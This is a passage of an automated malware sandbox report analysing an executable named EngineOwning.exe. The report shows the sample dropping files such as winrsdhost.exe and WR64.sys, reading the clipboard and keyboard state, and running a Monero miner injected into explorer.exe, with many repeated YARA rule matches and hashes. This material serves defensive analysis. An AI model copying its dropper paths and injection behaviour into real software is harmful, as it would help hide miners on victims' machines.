V","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-04-26T17:04:22.3029034Z||.||10a0979c-5774-4dd8-98f8-82150f1aca83||1152921505694779576||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
      Source: svchost.exe, 00000025.00000003.660162133.0000022983071000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.660255697.0000022983082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-04-26T17:04:22.3029034Z||.||10a0979c-5774-4dd8-98f8-82150f1aca83||1152921505694779576||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF698E0 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF698E0 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,
      Source: EngineOwning.exeBinary or memory string: DirectInput8Create
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF6C480 RegisterRawInputDevices,_RTC_CheckStackVars,
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF6CAD0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

      System Summary

      barindex
      Source: 40.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 40.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 40.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
      Source: servicesx86[1].exe.0.drStatic PE information: section name: a%0r0
      Source: winrsdhost.exe.0.drStatic PE information: section name: a%0r0
      Source: services86.exe.4.drStatic PE information: section name: a%0r0
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7076 -s 1908
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF61440
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF61920
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF77F30
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF62650
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7DA50
      Source: C:\ProgramData\winrsdhost.exeCode function: 4_2_00007FF9F1CD4870
      Source: C:\ProgramData\winrsdhost.exeCode function: 4_2_00007FF9F1CD0230
      Source: C:\ProgramData\winrsdhost.exeCode function: 4_2_00007FF9F1CD5364
      Source: C:\ProgramData\winrsdhost.exeCode function: 4_2_00007FF9F1CD6A6C
      Source: C:\ProgramData\winrsdhost.exeCode function: 4_2_00007FF9F1CD5467
      Source: C:\ProgramData\winrsdhost.exeCode function: 4_2_00007FF9F1CD6AE5
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF8076
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF8E22
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF0420
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF0DE9
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF2FC9
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF1757
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF9F1CB1958
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00000197E8411D06
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00000197E84120D6
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00000197E841250E
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00000197E84110D2
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00000197E841296A
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00007FF9F1D94840
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00007FF9F1D90410
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00007FF9F1D95514
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00007FF9F1D96C01
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00007FF9F1D96B99
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
      Source: EngineOwning.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
      Source: EngineOwning.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.EngineOwning.exe.7ff75af60000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.EngineOwning.exe.7ff75af60000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.2.EngineOwning.exe.7ff75af60000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.EngineOwning.exe.7ff75af60000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 40.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 40.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 40.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000028.00000002.700493754.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000028.00000002.701030193.0000000000AB4000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
